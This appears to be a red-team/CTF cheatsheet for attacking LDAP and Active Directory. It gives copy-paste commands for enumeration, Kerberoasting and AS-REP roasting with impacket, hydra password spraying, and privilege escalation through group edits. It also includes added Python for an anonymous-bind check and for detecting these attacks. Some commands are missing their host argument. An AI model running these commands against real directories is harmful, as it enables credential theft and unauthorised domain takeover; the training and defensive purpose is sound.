0) What is LDAP?
LDAP is a directory access protocol commonly used to query and modify directory services (Active Directory, OpenLDAP). By default it runs on TCP/UDP port 389 (plaintext); LDAPS (LDAP over TLS) typically runs on 636. LDAP stores user accounts, group membership, computer objects, and configuration data — making it extremely valuable during engagements.
1) Recon Phase
- Discover LDAP service and version:
nmap -sV -p 389 --script=ldap-rootdse,ldap-search
- Query DNS for domain controllers (SRV records):
dig _ldap._tcp.dc._msdcs. SRV
- Passive recon: collect domain names, public LDAP/AD endpoints, and service principal names (SPNs) via OSINT
- Check for anonymous bind allowed (quick win)
Start by identifying whether LDAP accepts anonymous binds and whether it advertises schema or rootDSE info. Domain controllers are high-priority targets.
2) Enumeration Phase
# Test anonymous bind and basic queries
# (note: -h is deprecated in current OpenLDAP clients; -H ldap://<host> is the equivalent)
ldapsearch -x -h -b "" -s base namingContexts
# Anonymous bind + enumerate common containers
ldapsearch -x -h -b "dc=example,dc=com" "(objectClass=*)" cn,sn,mail
# Authenticated enumeration (when creds available); -x is required for a simple bind with -D/-w
ldapsearch -x -D "user@domain" -w 'password' -b "dc=example,dc=com" "(objectClass=user)" sAMAccountName,memberOf,mail,distinguishedName
# SPN enumeration (Kerberos targets)
setspn -L   # on a Windows host, or via tools that query LDAP
# Use nmap NSE scripts for LDAP enumeration
nmap --script ldap-rootdse,ldap-search -p389
# Use BloodHound ingestion (via SharpHound) when actually on-network to build the AD graph
Look for: domain structure (OUs), user accounts, privileged groups (Domain Admins, Enterprise Admins), computer accounts, SPNs (for Kerberoasting), service account names, and password policy details.
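As an added example (written for this page, not part of the original cheatsheet or of ldap-utils), the following stdlib-only Python shows what the anonymous bind behind `ldapsearch -x` in sections 1 and 2 looks like on the wire and how to read the server's answer, so the "anonymous bind allowed?" check can be scripted and its result interpreted correctly. Encoding follows the BER layout in RFC 4511; `build_bind_response`, `check_anonymous_bind` and the result-code table are this example's own names, and the server responses it decodes are constructed here, not captures from any real directory.

```python
"""Anonymous LDAPv3 bind, encoded and decoded by hand (stdlib only).

Added example: not from the cheatsheet or from ldap-utils.  It builds the
BindRequest that `ldapsearch -x -b ""` sends when no -D/-w is given, and
decodes the BindResponse, so the "anonymous bind allowed?" check can be
scripted and its result interpreted.  Wire format per RFC 4511 (BER).
"""
import socket

# resultCode values from RFC 4511 that matter when auditing anonymous access.
RESULT_CODES = {
    0: "success",
    1: "operationsError",
    7: "authMethodNotSupported",
    8: "strongerAuthRequired",
    48: "inappropriateAuthentication",
    49: "invalidCredentials",
    53: "unwillingToPerform",
}


def _ber_len(n: int) -> bytes:
    """BER length octets: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    """One BER tag-length-value element."""
    return bytes([tag]) + _ber_len(len(value)) + value


def build_anonymous_bind(message_id: int = 1) -> bytes:
    """LDAPMessage { messageID, BindRequest { version 3, name "", simple "" } }.

    An empty DN with an empty simple password is what makes the bind anonymous.
    message_id is kept below 128 so the INTEGER fits one octet without a sign pad.
    """
    bind_request = _tlv(
        0x60,                          # [APPLICATION 0] BindRequest
        _tlv(0x02, b"\x03")            # version INTEGER 3
        + _tlv(0x04, b"")              # name LDAPDN = ""  (anonymous)
        + _tlv(0x80, b""),             # authentication simple [0] = ""
    )
    return _tlv(0x30, _tlv(0x02, bytes([message_id])) + bind_request)


def build_bind_response(message_id: int, result_code: int, diagnostic: str = "") -> bytes:
    """Server side of the exchange; used here to construct responses offline."""
    bind_response = _tlv(
        0x61,                                  # [APPLICATION 1] BindResponse
        _tlv(0x0A, bytes([result_code]))       # resultCode ENUMERATED
        + _tlv(0x04, b"")                      # matchedDN
        + _tlv(0x04, diagnostic.encode()),     # diagnosticMessage
    )
    return _tlv(0x30, _tlv(0x02, bytes([message_id])) + bind_response)


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the element) for the TLV at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                          # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_bind_response(data: bytes) -> dict:
    """Decode LDAPMessage { messageID, BindResponse { resultCode, matchedDN, diagnosticMessage } }."""
    tag, msg, _ = _read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, mid, pos = _read_tlv(msg, 0)
    tag, op, _ = _read_tlv(msg, pos)
    if tag != 0x61:
        raise ValueError("not a BindResponse")
    _, code, pos = _read_tlv(op, 0)
    _, matched, pos = _read_tlv(op, pos)
    _, diag, _ = _read_tlv(op, pos)
    rc = int.from_bytes(code, "big")
    return {
        "message_id": int.from_bytes(mid, "big"),
        "result_code": rc,
        "result_name": RESULT_CODES.get(rc, "other"),
        "matched_dn": matched.decode(errors="replace"),
        "diagnostic": diag.decode(errors="replace"),
        "anonymous_bind_accepted": rc == 0,
    }


def check_anonymous_bind(host: str, port: int = 389, timeout: float = 5.0) -> dict:
    """Run the exchange against a live directory you administer (needs network)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_anonymous_bind())
        return parse_bind_response(sock.recv(4096))


if __name__ == "__main__":
    # Offline demonstration with constructed responses (not real captures).
    print(build_anonymous_bind().hex())
    print(parse_bind_response(build_bind_response(1, 0)))
    print(parse_bind_response(build_bind_response(1, 48, "anonymous bind disallowed")))
```

A resultCode of 0 only means the bind step itself was accepted. Active Directory accepts an anonymous bind by default but then refuses any search outside the rootDSE, so the `-s base namingContexts` query above is the right follow-up to tell the two apart; an OpenLDAP server configured with `disallow bind_anon` answers 48 (inappropriateAuthentication) at the bind instead. For defenders, a BindRequest carrying an empty DN on port 389 is also the thing to look for in packet captures when anonymous access is supposed to be off.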
3) Exploitation Phase
- Anonymous bind => dump users/groups and password policy
ldapsearch -x -h -b "dc=example,dc=com" "(objectClass=user)"
- Kerberoasting (if SPNs found):
# request service tickets for SPNs and crack offline to recover service account passwords
- AS-REP roast (if accounts have DONT_REQ_PREAUTH):
Request the AS-REP for the account (impacket's GetNPUsers, listed under Tools) and crack it offline when pre-authentication is not required
- LDAP credential brute-force / password spray (authorized only):
hydra -L users.txt -P passwords.txt ldap://
- AD ACL abuse / LDAP modify (if creds with enough rights):
- modify group membership to escalate
- create new user and add to privileged groups (authorized CTF only)
- Abuse LDAPS/StartTLS TLS misconfigurations to downgrade or capture creds on network (authorized lab)
- Use recovered credentials to access RDP/SMB/HTTP services
Focus on enumerating high-privilege principals and SPNs for Kerberoast. If write access exists, follow rules of engagement — changes to AD are high-impact and often scored in CTFs.
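From the defender's side, each of the techniques above leaves a distinct trace on a domain controller. The following Python is an added example (not from the cheatsheet) that runs three detection rules over constructed Windows event records; the records are invented for the demo, not captured from a real DC, and their key=value field names are this example's own schema. The Event IDs are standard: Security 4769 (TGS request) with an RC4 (0x17) ticket for a non-computer, non-krbtgt service is the Kerberoasting indicator; Security 4768 (TGT request) with Pre-Authentication Type 0 identifies an AS-REP roastable account; Directory Service event 2889 records a simple bind on cleartext LDAP/389 (the "STARTTLS not required" item in the list below) and is written when LDAP Interface Events diagnostic logging is set to 2.

```python
"""Detection rules for the techniques in the exploitation section.

Added example, not from the cheatsheet.  Runs three rules over constructed
Windows domain-controller event records (invented for the demo, not captured
from a real DC).  Event IDs are the standard ones:
  Security 4769  TGS request : RC4 (0x17) ticket for a non-computer, non-krbtgt
                               service -> Kerberoasting indicator
  Security 4768  TGT request : PreAuthType 0 -> account has DONT_REQ_PREAUTH,
                               i.e. it is AS-REP roastable
  Directory Service 2889     : simple bind on cleartext LDAP/389 (BindType 0);
                               needs LDAP Interface Events diagnostics level 2
The key=value field names below are this example's own schema.
"""

# Constructed events, one per line, whitespace-separated key=value pairs.
SAMPLE_EVENTS = """\
EventID=4769 TargetUserName=alice@EXAMPLE.COM ServiceName=WS01$ TicketEncryptionType=0x12 IpAddress=10.0.0.5
EventID=4769 TargetUserName=alice@EXAMPLE.COM ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.5
EventID=4769 TargetUserName=alice@EXAMPLE.COM ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.5
EventID=4769 TargetUserName=alice@EXAMPLE.COM ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.0.0.5
EventID=4768 TargetUserName=bob PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.7
EventID=4768 TargetUserName=legacy_app PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.5
EventID=2889 ClientIP=10.0.0.5:51234 Identity=svc_backup@EXAMPLE.COM BindType=0
"""


def parse_events(text: str) -> list:
    """Turn the key=value lines into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if line.strip():
            events.append(dict(pair.split("=", 1) for pair in line.split()))
    return events


def is_kerberoast_candidate(e: dict) -> bool:
    """RC4 service ticket for a user-style service account (not a host$ or krbtgt)."""
    svc = e.get("ServiceName", "")
    return (e.get("EventID") == "4769"
            and e.get("TicketEncryptionType", "").lower() == "0x17"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def is_asrep_roast_candidate(e: dict) -> bool:
    """TGT issued without pre-authentication: the account itself is the finding."""
    return e.get("EventID") == "4768" and e.get("PreAuthType") == "0"


def is_cleartext_simple_bind(e: dict) -> bool:
    """Simple bind that arrived without TLS (2889 binding type 0)."""
    return e.get("EventID") == "2889" and e.get("BindType") == "0"


def detect(events: list, kerberoast_threshold: int = 2) -> list:
    """Return (rule, subject, detail) alerts.

    A single RC4 ticket can be a legacy client, so Kerberoasting is only
    raised when one requester pulls RC4 tickets for >= threshold distinct
    service accounts; the other two rules fire per event.
    """
    alerts = []
    rc4_services = {}
    for e in events:
        if is_kerberoast_candidate(e):
            rc4_services.setdefault(e["TargetUserName"], set()).add(e["ServiceName"])
        if is_asrep_roast_candidate(e):
            alerts.append(("asrep_roastable_account", e["TargetUserName"], e.get("IpAddress", "")))
        if is_cleartext_simple_bind(e):
            alerts.append(("cleartext_simple_bind", e["Identity"], e.get("ClientIP", "")))
    for requester, services in rc4_services.items():
        if len(services) >= kerberoast_threshold:
            alerts.append(("kerberoast_burst", requester, ",".join(sorted(services))))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The threshold and the (here implicit) time window are tuning decisions: `GetUserSPNs.py -request` requests tickets for every SPN it finds in one pass, which is why a burst of distinct services from one principal is the useful signal rather than any single RC4 ticket. The 4768 rule is worth running even with no attacker in sight, since it lists the accounts whose DONT_REQ_PREAUTH flag should be cleared, and the 2889 records are the inventory you need before enforcing LDAP signing or channel binding on the domain controllers.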
LDAP Info — What to Look For
- Anonymous bind allowed or weak anonymous access controls
- Exposed namingContexts / rootDSE revealing domain base DN
- Privileged groups membership (Domain Admins, Enterprise Admins)
- Service Principal Names (SPNs) for Kerberoasting
- Accounts without pre-auth (AS-REP roastable)
- Password policy details and lockout settings that affect spraying
- LDAP over plaintext (389) where STARTTLS is not required
Tools Required
sudo apt install nmap ldap-utils hydra
# Useful tooling:
# - impacket (GetUserSPNs, GetNPUsers) for Kerberoast / AS-REP
# - BloodHound + SharpHound for AD graphing (when on-network)
# - ldapdomaindump for quick dumps of AD via LDAP
# - python-ldap / ldap3 for scripted queries
Quick copy-paste command cheatsheet
# service discovery & rootDSE
nmap -sV -p 389 --script=ldap-rootdse,ldap-search
# check for anonymous bind & list namingContexts
ldapsearch -x -h -b "" -s base namingContexts
# anonymous bind & enumerate users (if allowed)
ldapsearch -x -h -b "dc=example,dc=com" "(objectClass=user)" sAMAccountName,distinguishedName,memberOf
# authenticated query (when creds available)
ldapsearch -x -D "administrator@example.com" -w 'Password123!' -b "dc=example,dc=com" "(objectClass=person)" cn,mail
# Kerberoast: discover SPNs (impacket)
GetUserSPNs.py -request -dc-ip -outputfile spns.txt domain/username:password
# AS-REP roast (impacket)
GetNPUsers.py -dc-ip -no-pass -outputfile asrep.json domain/ -usersfile users.txt
# brute/spray (authorized)
hydra -L users.txt -P passwords.txt ldap://
Red-team / CTF tips
- Anonymous bind and rootDSE give fast wins — capture base DN early.
- Scan for SPNs and AS-REP roastable accounts quickly — cracking those offline yields creds without noisy online attacks.
- Respect lockout policy — prefer Kerberoast/AS-REP over noisy full-account brute force in competition.
- Use BloodHound to prioritise high-value attack paths once you have credentials or enumeration data.
Citations
- RFC 4510 — LDAP: Technical Specification
- Nmap NSE — ldap-rootdse / ldap-search
- Impacket — useful AD / Kerberos tooling (GetUserSPNs, GetNPUsers)
Disclaimer: This guidance targets authorized testing and red-team/CTF contexts. Accessing or modifying directory data without explicit permission is illegal and unethical. AD modifications (user creation/group edits) are high-impact — only perform them within scope and per rules of engagement.